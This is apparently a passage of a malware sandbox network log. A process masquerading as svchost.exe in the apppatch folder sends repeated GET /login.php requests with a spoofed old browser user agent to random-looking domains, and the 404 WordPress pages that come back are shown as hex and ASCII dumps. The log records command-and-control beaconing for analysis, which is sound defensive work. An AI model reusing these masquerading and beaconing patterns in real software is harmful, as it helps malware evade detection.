                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79
                                                                                                                                                                                                              Data Ascii: tent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70
                                                                                                                                                                                                              Data Ascii: ble,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[typ
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c
                                                                                                                                                                                                              Data Ascii: nt .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .sel


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.850114188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:37 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:37 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XVVDvfTPVq9kVwA2OMG%2BQ7Wh3RxUu2n%2Fnbe1UvtKCbBUx%2BycbYrOslijTCCN3neabQx%2Bgsdwp5E1pi3VO15D5iIq8u4l1PduUpkkRrbWxnG5ImqbjDfH3mpBVGAjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100744191c1921-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1293&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=15d0f1ed8208f477&ts=776&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC420INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70
                                                                                                                                                                                                              Data Ascii: yle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta prop
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e
                                                                                                                                                                                                              Data Ascii: on c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                              Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                              Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                              Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                              Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                              Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
                                                                                                                                                                                                              2024-11-11 17:33:38 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                              Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.850115188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:39 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:40 UTC1096INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:40 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="44.8",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="17.6",amp_optimizer;dur="22.8"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ%2BJ%2Bm8hfbFG1si9e3uB4EnLW%2Fk8IiSwdNLKuFf8m5kfNPwuodid%2FoheG3DpGI12BBbXMpa8EvxDTS9Jk8LDBR4RX%2FWmdnXsQjiX9jCqkuYdROSle9UDxpnd%2F%2BxRwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1007518df21906-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2533683&cwnd=236&unsent_bytes=0&cid=fcf2c50331b3e5db&ts=1519&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:40 UTC273INData Raw: 37 63 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c16<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-11-11 17:33:40 UTC1369INData Raw: 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65
                                                                                                                                                                                                              Data Ascii: ta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{he
                                                                                                                                                                                                              2024-11-11 17:33:40 UTC1369INData Raw: 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68
                                                                                                                                                                                                              Data Ascii: -scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-ligh


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.850116188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:41 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1085INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:43 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="44.1",amp_style_sanitizer;dur="21.7",amp_tag_and_attribute_sanitizer;dur="16.3",amp_optimizer;dur="22.3"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
